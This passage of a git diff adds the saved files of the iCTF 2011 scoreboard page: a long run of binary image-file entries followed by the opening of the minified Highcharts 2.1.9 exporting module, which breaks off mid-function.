b/ictf2011/scoreboard.ictf2011_end.info_files/._190.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._191.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._191.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._192.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._192.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._193.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._193.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._194.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._194.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._195.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._195.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._196.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._196.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._197.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._197.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._198.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._198.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._199.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._199.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._200.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._200.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._201.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._201.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._202.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._202.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._203.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._203.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._204.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._204.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._205.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._205.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._206.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._206.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._207.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._207.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._208.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._208.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._209.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._209.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._210.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._210.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._211.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._211.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._212.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._212.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._213.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._213.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._214.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._214.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._215.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._215.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._ar.png b/ictf2011/scoreboard.ictf2011_end.info_files/._ar.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._at.png b/ictf2011/scoreboard.ictf2011_end.info_files/._at.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._au.png b/ictf2011/scoreboard.ictf2011_end.info_files/._au.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._br.png b/ictf2011/scoreboard.ictf2011_end.info_files/._br.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._broken.png b/ictf2011/scoreboard.ictf2011_end.info_files/._broken.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._ca.png b/ictf2011/scoreboard.ictf2011_end.info_files/._ca.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._cn.png b/ictf2011/scoreboard.ictf2011_end.info_files/._cn.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._de.png b/ictf2011/scoreboard.ictf2011_end.info_files/._de.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._dk.png b/ictf2011/scoreboard.ictf2011_end.info_files/._dk.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._exporting.js b/ictf2011/scoreboard.ictf2011_end.info_files/._exporting.js Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._fr.png b/ictf2011/scoreboard.ictf2011_end.info_files/._fr.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._gb.png b/ictf2011/scoreboard.ictf2011_end.info_files/._gb.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._gray.js b/ictf2011/scoreboard.ictf2011_end.info_files/._gray.js Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._highcharts.js b/ictf2011/scoreboard.ictf2011_end.info_files/._highcharts.js Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._hu.png b/ictf2011/scoreboard.ictf2011_end.info_files/._hu.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._in.png b/ictf2011/scoreboard.ictf2011_end.info_files/._in.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._it.png b/ictf2011/scoreboard.ictf2011_end.info_files/._it.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._jquery.min.js b/ictf2011/scoreboard.ictf2011_end.info_files/._jquery.min.js Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._jquery.tablesorter.min.js b/ictf2011/scoreboard.ictf2011_end.info_files/._jquery.tablesorter.min.js Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._locked.png b/ictf2011/scoreboard.ictf2011_end.info_files/._locked.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._my.png b/ictf2011/scoreboard.ictf2011_end.info_files/._my.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._nl.png b/ictf2011/scoreboard.ictf2011_end.info_files/._nl.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._off.gif b/ictf2011/scoreboard.ictf2011_end.info_files/._off.gif Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._on.gif b/ictf2011/scoreboard.ictf2011_end.info_files/._on.gif Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._processing-1.3.6.min.js b/ictf2011/scoreboard.ictf2011_end.info_files/._processing-1.3.6.min.js Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._ru.png b/ictf2011/scoreboard.ictf2011_end.info_files/._ru.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._score-anim.html b/ictf2011/scoreboard.ictf2011_end.info_files/._score-anim.html Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._score-chart.html b/ictf2011/scoreboard.ictf2011_end.info_files/._score-chart.html Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._score-graph.html b/ictf2011/scoreboard.ictf2011_end.info_files/._score-graph.html Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._sg.png b/ictf2011/scoreboard.ictf2011_end.info_files/._sg.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._us.png b/ictf2011/scoreboard.ictf2011_end.info_files/._us.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._world.svg b/ictf2011/scoreboard.ictf2011_end.info_files/._world.svg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/129.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/129.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/130.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/130.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/131.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/131.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/132.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/132.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/133.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/133.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/134.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/134.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/135.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/135.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/136.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/136.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/137.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/137.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/138.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/138.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/139.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/139.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/140.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/140.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/141.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/141.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/142.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/142.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/143.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/143.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/144.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/144.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/145.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/145.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/146.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/146.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/147.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/147.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/148.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/148.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/149.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/149.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/150.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/150.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/151.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/151.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/152.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/152.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/153.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/153.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/154.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/154.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/155.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/155.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/156.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/156.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/157.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/157.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/158.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/158.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/159.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/159.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/160.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/160.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/161.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/161.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/162.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/162.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/163.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/163.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/164.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/164.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/165.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/165.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/166.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/166.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/167.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/167.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/168.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/168.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/169.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/169.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/170.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/170.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/171.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/171.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/172.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/172.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/173.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/173.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/174.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/174.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/175.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/175.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/176.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/176.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/177.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/177.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/178.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/178.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/179.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/179.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/180.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/180.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/181.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/181.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/182.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/182.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/183.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/183.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/184.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/184.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/185.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/185.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/186.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/186.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/187.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/187.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/188.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/188.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/189.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/189.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/190.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/190.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/191.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/191.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/192.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/192.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/193.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/193.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/194.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/194.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/195.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/195.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/196.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/196.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/197.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/197.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/198.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/198.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/199.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/199.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/200.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/200.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/201.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/201.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/202.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/202.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/203.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/203.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/204.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/204.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/205.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/205.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/206.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/206.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/207.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/207.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/208.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/208.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/209.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/209.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/210.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/210.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/211.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/211.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/212.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/212.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/213.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/213.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/214.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/214.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/215.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/215.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/ar.png b/ictf2011/scoreboard.ictf2011_end.info_files/ar.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/at.png b/ictf2011/scoreboard.ictf2011_end.info_files/at.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/au.png b/ictf2011/scoreboard.ictf2011_end.info_files/au.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/br.png b/ictf2011/scoreboard.ictf2011_end.info_files/br.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/broken.png b/ictf2011/scoreboard.ictf2011_end.info_files/broken.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/ca.png b/ictf2011/scoreboard.ictf2011_end.info_files/ca.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/cn.png b/ictf2011/scoreboard.ictf2011_end.info_files/cn.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/de.png b/ictf2011/scoreboard.ictf2011_end.info_files/de.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/dk.png b/ictf2011/scoreboard.ictf2011_end.info_files/dk.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/exporting.js b/ictf2011/scoreboard.ictf2011_end.info_files/exporting.js @@ -0,0 +1,24 @@ +/* + Highcharts JS v2.1.9 (2011-11-11) + Exporting module + + (c) 2010-2011 Torstein H?nsi + + License: www.highcharts.com/license +*/ +(function(){var n=Highcharts,A=n.Chart,B=n.addEvent,E=n.removeEvent,t=n.createElement,w=n.discardElement,u=n.css,x=n.merge,q=n.each,r=n.extend,F=Math.max,s=document,G=window,C=s.documentElement.ontouchstart!==undefined,y=n.getOptions();r(y.lang,{downloadPNG:"Download PNG image",downloadJPEG:"Download JPEG image",downloadPDF:"Download PDF document",downloadSVG:"Download SVG vector image",exportButtonTitle:"Export to raster or vector image",printButtonTitle:"Print the chart"});y.navigation={menuStyle:{border:"1px solid #A0A0A0", +background:"#FFFFFF"},menuItemStyle:{padding:"0 5px",background:"none",color:"#303030",fontSize:C?"14px":"11px"},menuItemHoverStyle:{background:"#4572A5",color:"#FFFFFF"},buttonOptions:{align:"right",backgroundColor:{linearGradient:[0,0,0,20],stops:[[0.4,"#F7F7F7"],[0.6,"#E3E3E3"]]},borderColor:"#B0B0B0",borderRadius:3,borderWidth:1,height:20,hoverBorderColor:"#909090",hoverSymbolFill:"#81A7CF",hoverSymbolStroke:"#4572A5",symbolFill:"#E0E0E0",symbolStroke:"#A0A0A0",symbolX:11.5,symbolY:10.5,verticalAlign:"top", +width:24,y:10}};y.exporting={type:"image/png",url:"http://export.highcharts.com/",width:800,enableImages:false,buttons:{exportButton:{symbol:"exportIcon",x:-10,symbolFill:"#A8BF77",hoverSymbolFill:"#768F3E",_id:"exportButton",_titleKey:"exportButtonTitle",menuItems:[{textKey:"downloadPNG",onclick:function(){this.exportChart()}},{textKey:"downloadJPEG",onclick:function(){this.exportChart({type:"image/jpeg"})}},{textKey:"downloadPDF",onclick:function(){this.exportChart({type:"application/pdf"})}},{textKey:"downloadSVG", +onclick:function(){this.exportChart({type:"image/svg+xml"})}}]},printButton:{symbol:"printIcon",x:-36,symbolFill:"#B5C9DF",hoverSymbolFill:"#779ABF",_id:"printButton",_titleKey:"printButtonTitle",onclick:function(){this.print()}}}};r(A.prototype,{getSVG:function(b){var c=this,a,f,d,k,e,j,h=x(c.options,b);if(!s.createElementNS)s.createElementNS=function(i,g){var o=s.createElement(g);o.getBBox=function(){return n.Renderer.prototype.Element.prototype.getBBox.apply({element:o})};return o};b=t("div",null, +{position:"absolute",top:"-9999em",width:c.chartWidth+"px",height:c.chartHeight+"px"},s.body);r(h.chart,{renderTo:b,forExport:true});h.exporting.enabled=false;if(!h.exporting.enableImages)h.chart.plotBackgroundImage=null;h.series=[];q(c.series,function(i){d=i.options;d.animation=false;d.showCheckbox=false;d.visible=i.visible;if(!h.exporting.enableImages)if(d&&d.marker&&/^url\(/.test(d.marker.symbol))d.marker.symbol="circle";d.data=[];q(i.data,function(g){k=g.config;e={x:g.x,y:g.y,name:g.name};typeof k=== +"object"&&g.config&&k.constructor!==Array&&r(e,k);e.visible=g.visible;d.data.push(e);if(!h.exporting.enableImages)(j=g.config&&g.config.marker)&&/^url\(/.test(j.symbol)&&delete j.symbol});h.series.push(d)});a=new Highcharts.Chart(h);q(["xAxis","yAxis"],function(i){q(c[i],function(g,o){var l=a[i][o],m=g.getExtremes(),p=m.userMin;m=m.userMax;if(p!==void 0||m!==void 0)l.setExtremes(p,m,true,false)})});f=a.container.innerHTML;h=null;a.destroy();w(b);f=f.replace(/zIndex="[^"]+"/g,"").replace(/isShadow="[^"]+"/g, +"").replace(/symbolName="[^"]+"/g,"").replace(/jQuery[0-9]+="[^"]+"/g,"").replace(/isTracker="[^"]+"/g,"").replace(/url\([^#]+#/g,"url(#").replace(/<svg /,'<svg xmlns:xlink="http://www.w3.org/1999/xlink" ').replace(/ href=/g," xlink:href=").replace(/ /g,"\u00a0").replace(/­/g,"\u00ad").replace(/id=([^" >]+)/g,'id="$1"').replace(/class=([^" ]+)/g,'class="$1"').replace(/ transform /g," ").replace(/:(path|rect)/g,"$1").replace(/<img ([^>]*)>/gi,"<image $1 />").replace(/<\/image>/g,"").replace(/<image ([^>]*)([^\/])>/gi, +"<image $1$2 />").replace(/width=(\d+)/g,'width="$1"').replace(/height=(\d+)/g,'height="$1"').replace(/hc-svg-href="/g,'xlink:href="').replace(/style="([^"]+)"/g,function(i){return i.toLowerCase()});f=f.replace(/(url\(#highcharts-[0-9]+)"/g,"$1").replace(/"/g,"'");if(f.match(/ xmlns="/g).length===2)f=f.replace(/xmlns="[^"]+"/,"");return f},exportChart:function(b,c){var a,f=this.getSVG(c);b=x(this.options.exporting,b);a=t("form",{method:"post",action:b.url},{display:"none"},s.body);q(["filename", +"type","width","svg"],function(d){t("input",{type:"hidden",name:d,value:{filename:b.filename||"chart",type:b.type,width:b.width,svg:f}[d]},null,a)});a.submit();w(a)},print:function(){var b=this,c=b.container,a=[],f=c.parentNode,d=s.body,k=d.childNodes;if(!b.isPrinting){b.isPrinting=true;q(k,function(e,j){if(e.nodeType===1){a[j]=e.style.display;e.style.display="none"}});d.appendChild(c);G.print();setTimeout(function(){f.appendChild(c);q(k,function(e,j){if(e.nodeType===1)e.style.display=a[j]});b.isPrinting= +false},1E3)}},contextMenu:function(b,c,a,f,d,k){var e=this,j=e.options.navigation,h=j.menuItemStyle,i=e.chartWidth,g=e.chartHeight,o="cache-"+b,l=e[o],m=F(d,k),p,z;if(!l){e[o]=l=t("div",{className:"highcharts-"+b},{position:"absolute",zIndex:1E3,padding:m+"px"},e.container);p=t("div",null,r({MozBoxShadow:"3px 3px 10px #888",WebkitBoxShadow:"3px 3px 10px #888",boxShadow:"3px 3px 10px #888"},j.menuStyle),l);z=function(){u(l,{display:"none"})};B(l,"mouseleave",z);q(c,function(v){if(v){var D=t("div", +{onmouseover:function(){u(this,j.menuItemHoverStyle)},onmouseout:function(){u(this,h)},innerHTML:v.text||e.options.lang[v.textKey]},r({cursor:"pointer"},h),p);D[C?"ontouchstart":"onclick"]=function(){z();v.onclick.apply(e,arguments)};e.exportDivElements.push(D)}});e.exportDivElements.push(p,l);e.exportMenuWidth=l.offsetWidth;e.exportMenuHeight=l.offsetHeight}b={display:"block"};if(a+e.exportMenuWidth>i)b.right=i-a-d-m+"px";else b.left=a-m+"px";if(f+k+e.exportMenuHeight>g)b.bottom=g-f-m+"px";else b.top= +f+k-m+"px";u(l,b)},addButton:function(b){function c(){g.attr(m);i.attr(l)}var a=this,f=a.renderer,d=x(a.options.navigation.buttonOptions,b),k=d.onclick,e=d.menuItems,j=d.width,h=d.height,i,g,o;b=d.borderWidth;var l={stroke:d.borderColor},m={stroke:d.symbolStroke,fill:d.symbolFill};if(!a.exportDivElements){a.exportDivElements=[];a.exportSVGElements=[]}if(d.enabled!==false){i=f.rect(0,0,j,h,d.borderRadius,b).align(d,true).attr(r({fill:d.backgroundColor,"stroke-width":b,zIndex:19},l)).add();o=f.rect(0, +0,j,h,0).align(d).attr({id:d._id,fill:"rgba(255, 255, 255, 0.001)",title:a.options.lang[d._titleKey],zIndex:21}).css({cursor:"pointer"}).on("mouseover",function(){g.attr({stroke:d.hoverSymbolStroke,fill:d.hoverSymbolFill});i.attr({stroke:d.hoverBorderColor})}).on("mouseout",c).on("click",c).add();if(e)k=function(){c();var 